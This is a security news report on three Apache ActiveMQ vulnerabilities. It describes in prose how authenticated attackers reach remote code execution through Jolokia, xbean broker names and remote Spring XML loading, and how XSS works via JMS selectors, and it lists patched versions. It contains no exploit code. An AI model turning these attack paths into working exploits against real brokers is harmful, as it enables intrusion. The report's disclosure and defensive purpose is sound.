Apache ActiveMQ, the world’s most popular open-source message broker, is currently facing a series of “Important” security threats. As a cornerstone of enterprise middleware, ActiveMQ facilitates communication across a staggering array of languages and platforms, including JavaScript, C++, Python, and .Net. However, three newly identified —CVE-2026-41044, CVE-2026-40466, and CVE-2026-41043—now threaten to turn this connectivity against its users.
If successfully exploited, these allow authenticated attackers to move from simple message management to full Remote Code Execution (RCE) on the broker’s JVM.
Two of the most severe vulnerabilities center on the Jolokia management interface and its interaction with the Spring Framework.
CVE-2026-41044 allows an authenticated attacker to bypass name validation in the admin web console. By constructing a malicious broker name that includes an xbean binding, the attacker sets a trap. When a VM transport is later created via the Destination View MBean, it references this malicious name, triggering the loading of a remote Spring XML application context.
In a sophisticated follow-up, researchers found a way to bypass previous security fixes. This is tracked as CVE-2026-40466. By adding a connector using an HTTP Discovery transport through Jolokia, an attacker can point the broker toward a malicious HTTP endpoint. This endpoint returns a VM transport that triggers the same remote Spring XML loading mechanism.
In both cases, the result is identical: “Because Spring’s ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker’s JVM through bean factory methods such as Runtime.exec().”
A high-severity Cross-Site Scripting (XSS) also haunts the ActiveMQ Web Console. An authenticated attacker can inject malicious HTML into a JMS selector field. By overriding the content type to HTML instead of the expected XML, the attacker can force the console to render and execute malicious scripts when an administrator browses the queues. This could lead to session hijacking or further administrative compromise.
The Apache Software Foundation has released patches to address these vulnerabilities across both the 5.x and 6.x branches.
| Affected Component | Vulnerable Versions | Required Patch |
| Apache ActiveMQ | Before 5.19.6 | 5.19.6 |
| Apache ActiveMQ | 6.0.0 to 6.2.4 | 6.2.5 |
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
